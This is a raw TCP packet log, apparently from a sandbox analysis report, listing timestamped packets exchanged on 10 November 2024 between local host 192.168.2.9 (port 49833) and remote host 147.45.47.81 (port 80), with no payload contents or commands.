                                                                                                                                                                                Nov 10, 2024 09:18:26.203727007 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.251106024 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.251120090 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.251138926 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.251152039 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.251164913 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.251176119 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.251198053 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.292829037 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.303349018 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.303423882 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.303436041 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.303447962 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.303466082 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.303484917 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.303488970 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.303551912 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.303589106 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.317428112 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.317449093 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.317461014 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.317493916 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.317503929 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.317524910 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.317537069 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.317547083 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.317589998 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.317703962 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.317728996 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.317739964 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.317766905 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.317850113 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.317894936 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.317914009 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.317925930 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.317939997 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.317955971 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.317967892 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.317996025 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.318247080 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.318258047 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.318269968 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.318281889 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.318294048 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.318335056 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.318451881 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.318556070 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.318568945 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.318579912 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.318593025 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.318609953 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.318639994 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.318825006 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.318839073 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.318850040 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.318866968 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.318873882 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.318883896 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.318888903 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.318897009 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.318917036 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.319221973 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.319263935 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.319325924 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.319370985 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.319381952 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.319397926 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.319411993 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.319433928 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.366667032 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.366697073 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.366708994 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.366722107 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.366735935 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.366750956 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.366770029 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.366770029 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.366826057 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.418976068 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.419008970 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.419032097 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.419049978 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.419054985 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.419066906 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.419092894 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.433017015 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.433043957 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.433058977 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.433070898 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.433075905 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.433099985 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.433135986 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.433151960 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.433175087 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.433293104 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.433309078 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.433322906 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.433336973 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.433360100 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.433429956 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.433444023 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.433479071 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.433547974 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.433563948 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.433579922 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.433597088 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.433602095 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.433633089 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.433789968 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.433842897 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.433857918 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.433876991 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.433880091 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.433897018 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.433919907 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.434123039 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.434165001 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.434241056 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.434256077 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.434271097 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.434289932 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.434292078 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.434314013 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.434324980 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.434329987 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.434345007 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.434362888 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.434659004 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.434683084 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.434700012 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.434705019 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.434715033 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.434741020 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.434895992 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.434933901 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.434954882 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.434977055 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.434993982 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.435017109 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.435020924 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.435053110 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.482484102 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.482502937 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.482553959 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.482590914 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.482654095 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.482670069 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.482687950 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.482697964 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.482729912 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.534668922 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.534691095 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.534706116 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.534720898 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.534744978 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.534756899 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.534760952 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.534787893 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.534813881 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.548613071 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.548650980 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.548665047 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.548692942 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.548716068 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.548731089 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.548746109 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.548759937 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.548762083 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.548798084 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.548898935 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.548913956 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.548928976 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.548940897 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.548969984 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.549043894 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.549089909 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.549108028 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.549128056 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.549175978 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.549190998 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.549206972 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.549218893 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.549258947 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.549376011 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.549392939 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.549417019 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.549438953 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.549448967 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.549515009 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.549653053 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.549679995 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.549695015 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.549727917 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.549861908 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.549876928 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.549897909 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.549913883 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.549942017 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.550184011 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.550199986 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.550214052 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.550232887 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.550240040 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.550252914 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.550261021 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.550268888 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.550285101 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.550299883 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.550302982 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.550322056 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.550662994 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.550678968 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.550693989 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.550712109 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.550728083 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.550740957 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.550740957 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.550781012 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.598134995 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.598166943 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.598180056 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.598263025 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.598282099 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.598283052 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.598299026 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.598339081 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.598339081 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.598381042 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.598423958 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.598476887 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.650341034 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.650358915 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.650376081 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.650443077 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.664623022 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.664669991 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.664678097 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.664686918 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.664787054 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.664836884 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.664855003 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.664864063 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.664880991 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.664896011 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.664904118 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.664906025 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.664911032 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.665004969 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.665041924 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.665085077 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.665111065 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.665127993 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.665133953 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.665137053 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.665189981 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.665352106 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.665405035 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.665416956 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.665432930 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.665488958 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.665509939 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.665524960 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.665533066 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.665539980 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.665551901 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.665633917 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.665936947 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.665986061 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.666001081 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.666013002 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.666019917 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.666028023 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.666032076 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.666084051 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.666091919 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.666093111 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.666100025 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.666107893 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.666265965 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.666620016 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.666640997 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.666655064 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.666668892 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.666677952 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.666690111 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.666743040 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.707248926 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.707264900 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.707336903 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.713994980 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.714013100 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.714020967 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.714066982 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.714083910 CET8049833147.45.47.81192.168.2.9
